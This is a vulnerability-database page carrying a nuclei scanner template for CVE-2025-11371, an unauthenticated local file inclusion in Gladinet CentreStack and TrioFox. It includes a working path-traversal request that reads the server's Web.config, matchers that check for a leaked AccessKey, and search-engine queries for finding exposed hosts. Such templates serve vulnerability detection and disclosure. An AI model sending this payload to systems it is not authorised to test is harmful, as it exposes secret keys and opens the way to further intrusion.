Lucene search
K

Gladinet CentreStack & TrioFox - Local File Inclusion

🗓️ 25 Jun 2026 05:45:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

Unauthenticated local file inclusion in Gladinet CentreStack and TrioFox exposes system files.

Related
Refs
Code
id: CVE-2025-11371

info:
  name: Gladinet CentreStack & TrioFox - Local File Inclusion
  author: Kazgangap
  severity: medium
  description: |
    In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild.  This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560
  impact: |
    Unauthenticated attackers can disclose sensitive system files, potentially leading to information leakage.
  remediation: |
    Update to a version later than 16.7.10368.56560 or the latest available version.
  reference:
    - https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11371.md
    - https://thehackernews.com/2025/10/from-lfi-to-rce-active-exploitation.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11371
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.2
    cve-id: CVE-2025-11371
    cwe-id: CWE-552
    epss-score: 0.92094
    epss-percentile: 0.99807
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"CentreStack"
    fofa-query: "CentreStack - Login"
  tags: cve,cve2025,gladinet,lfi,centrestack,vkev,vuln,kev

http:
  - raw:
      - |
        GET /storage/t.dn?s=..%5C..%5C..%5CProgram+Files+(x86)%5CGladinet+Cloud+Enterprise%5Croot%5CWeb.config&sid=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "<configuration>", "<system.web>", "AccessKey")'
          - 'contains(content_type, "application/octet-stream")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450221009b07623bc20c52eec3752836b460e5fae0c55c470d5277722e8e4ddfa97d49de02206e75a3034daac8edfe76d09111755a12ac33fbf2a193df3267ec824e9dc3006a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.17.5
EPSS0.92094
SSVC
16